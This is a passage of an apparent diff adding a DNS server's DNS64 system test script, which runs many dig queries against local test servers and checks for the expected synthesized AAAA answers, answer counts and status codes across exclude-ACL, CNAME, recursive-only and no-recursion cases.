"checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +# Check the example. domain + +echo_i "checking non-excluded AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-bad-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-good-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl ignores mapped A records (all mapped) ($n)" +ret=0 +$DIG $DIGOPTS a-and-mapped.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::1.2.3.5" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl ignores mapped A records (some mapped) ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa-and-mapped.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::4" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::ffff:1.2.3.4" dig.out.ns2.test$n > /dev/null && ret=1 +grep "::ffff:1.2.3.5" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl works with AAAA only ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl A only lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially excluded only AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded AAAA and non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded only AAAA and mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-good-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-not-mapped.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS mx-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS non-existent.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-mx-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-non-existent.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the example. domain recursive only + +echo_i "checking non-excluded AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially excluded only AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded AAAA and non-mapped A lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded only AAAA and mapped A lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::102:304" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup works, recursive only ($n)" +ret=0 +$DIG $DIGOPTS cname-non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the example. domain recursive only w/o recursion + +echo_i "checking non-excluded AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially excluded only AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec partially-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded AAAA and non-mapped A lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec partially-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded only AAAA and mapped A lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec partially-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ 